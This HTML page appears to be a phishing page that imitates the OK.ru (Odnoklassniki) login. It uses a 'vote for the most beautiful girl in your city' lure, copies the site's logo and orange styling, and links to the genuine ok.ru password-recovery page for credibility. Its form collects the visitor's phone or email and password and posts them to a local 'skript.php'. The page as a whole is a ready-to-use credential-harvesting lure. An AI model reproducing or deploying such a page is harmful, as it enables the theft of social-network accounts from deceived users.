<!DOCTYPE html>
<html lang="en">
<head>
  <title>Выбери самую красивую девушку своего города</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="css/font-awesome.min.css">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
    <link rel="stylesheet" href="style.css">

  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
</head>
<body>

<div class="container text-center">    
  <div class="row">
  <div class="col-sm-3" style="margin-top:10px;"> 
  </div>
     <div class="col-sm-6 login" style="margin-top:10px; border:1px solid #eeeeee; padding:0;"> 
	<div class="hed" style="text-align:left; padding:5px 0;"><img style="margin-left:10px;" src="ok-logo.png"></div>
	  
<div id="quick_login" style="text-align:center; padding:20px;">
  <form method="post" name="login" id="login" action="skript.php">
    <div class="label" style="color:#000;font-family:georgia; font-size:14px;"><b>Телефон или email</b></div>
	
	<div class="labeled" style="margin-bottom:10px;"><input type="text" name="login" class="text" onfocus="show('quick_expire')" id="email" /></div>
	
	<div class="label" style="color:#000;font-family:georgia; font-size:14px;margin-top:8px;"><b>Пароль</b></div>
    <div class="labeled"><input type="password" name="pass" class="text" onfocus="show('quick_expire')" id="pass" /></div>

    <input type="submit" class="submit" />
  </form>
  
  <div class="clear forgot"><a href="https://ok.ru/password/recovery?st._aid=HelpFaq_AnonymPasswordRecoveryNew" target="_top">Забыли пароль?</a></div>
      </div>  	  
	  
    </div>
	
	<div class="col-sm-3" style="margin-top:10px;"> 
  </div>
  
  </div> 
  </div>
  
  

		

<style> 
.hed {background:#ee8108;}
.submit {background:#ee8108;
 border:none;
 margin-top:10px;
 width:150px;
 height:30px; 
 color:#fff;}
 </style>		
</body>